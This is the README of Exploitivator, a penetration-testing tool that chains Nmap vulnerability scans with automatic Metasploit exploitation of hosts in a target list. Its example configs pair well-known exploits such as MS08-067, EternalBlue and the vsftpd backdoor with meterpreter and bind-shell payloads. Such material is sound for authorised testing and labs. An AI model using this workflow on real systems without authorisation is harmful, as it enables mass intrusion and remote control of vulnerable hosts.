============= Exploitivator

============= Prerequisites

This has only been tested on Kali.

It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/

Install the necessary Kali packages and the PostgreSQL gem for Ruby: apt-get install postgresql libpq-dev git-core gem install pg

Install current version of the msfrpc Python module from git: git clone git://github.com/SpiderLabs/msfrpc.git msfrpc cd msfrpc/python-msfrpc python setup.py install

===== Usage

Before running either of the scripts, load msfconsole and start the MSGRPC service.
MSGRPC can be started with msfrpcd in Metasploit as follows: load msgrpc Pass=abc123

The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt).

Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.

Exploitivator

Command line usage:

Examples: The application can be run as follows, where '10.128.108.178' is the IP address of the attack machine, 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password: ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123

MSFScan

Command line usage: ./msf_scan.py filename ./msf_scan.py filename MSF_DB_Username MSF_DB_Password

Examples: The application can be run as follows, where 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password: ./msf_scan.py hosts.txt msf abc123

To run with 'hosts.txt' as a list of target hosts, using the script's default Metasploit Postgres username(msf) and the script's default Metasploit Postgres password(abc123): ./msf_scan.py hosts.txt

============ Config Files

Both scripts rely on config files to provide details of required Nmap and Metasploit scamns and attacks.

MSFScan

The script uses a config file with the name 'scan_types.cfg'. This contains a list of paths for any Metasploit scans the are to run against the targets. e.g.: auxiliary/scanner/dcerpc/endpoint_mapper auxiliary/scanner/smb/smb_version auxiliary/scanner/x11/open_x11 auxiliary/scanner/discovery/ipv6_multicast_ping auxiliary/scanner/discovery/ipv6_neighbor auxiliary/scanner/smb/smb_login

Exploitivator

This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg). These use '##' as a separator and have the following formats.

exploitivator_scan.cfg: [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional - grep command to be used if Nmap's greppable output is being used]

In the above format:

1. The first section is a label linking the scan to the exploit
2. The second section is the part of the Namp command line which specifies details of the type of scan to run, such as port and script
3. The third section is the part of the Namp command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
4. The optional fourth section is the gep command that you wish to use in order to identify a vulnerable target within a '.gnmap' file

An example file content is shown below: SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632/open/tcp//distccd" JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099/open/tcp//rmi VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"

exploitivator.cfg: [Label]##[Metasploit exploit path]##[Optional - Metasploit payload details]

An example file content is shown below: SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none

========== References

Starting and connecting to MSGRPC: https://www.packtpub.com/mapt/book/networking_and_servers/9781785280696/9/ch09lvl1sec60/metasploit-scripting-with-msgrpc

Setting RHOSTS to use a file instead of a range: http://travisaltman.com/metasploit-set-rhosts-file/